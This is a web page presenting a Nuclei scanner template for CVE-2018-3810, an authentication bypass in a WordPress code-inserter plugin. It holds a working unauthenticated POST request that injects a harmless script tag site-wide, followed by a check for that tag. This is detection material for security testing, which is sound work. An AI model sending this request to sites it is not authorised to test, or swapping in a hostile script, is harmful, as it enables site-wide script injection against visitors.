Skip to content

Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass

ID: CVE-2018-3810

Severity: critical

Author: princechaddha

Tags: cve,cve2018,wordpress,google,edb,oturia

Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.

id: CVE-2018-3810
info:
name: Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass
author: princechaddha
severity: critical
description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code.
impact: |
An attacker can bypass authentication and gain unauthorized access to the affected WordPress site.
remediation: |
Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability.
reference:
- https://www.exploit-db.com/exploits/43420
- https://nvd.nist.gov/vuln/detail/CVE-2018-3810
- https://wordpress.org/plugins/smart-google-code-inserter/#developers
- https://limbenjamin.com/articles/smart-google-code-inserter-auth-bypass.html
- https://wpvulndb.com/vulnerabilities/8987
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-3810
cwe-id: CWE-287
epss-score: 0.792
epss-percentile: 0.98197
cpe: cpe:2.3:a:oturia:smart_google_code_inserter:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
vendor: oturia
product: smart_google_code_inserter
framework: wordpress
tags: cve,cve2018,wordpress,google,edb,oturia
http:
- method: POST
path:
- "{{BaseURL}}/wp-admin/options-general.php?page=smartcode"
body: 'sgcgoogleanalytic=<script>console.log("document.domain")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode'
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- '<script>console.log("document.domain")</script>'
- type: status
status:
- 200
# digest: 4a0a00473045022100c8a3717562868ecdb0d3b31229dfd14269ce9acfe34a68a2e63a9585b67a03d102206c2f1a5cfa70a22d749323c9feb023dc5cb32b99f593cbcef3f4e430f97a9090:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-3810.yaml"

View on Github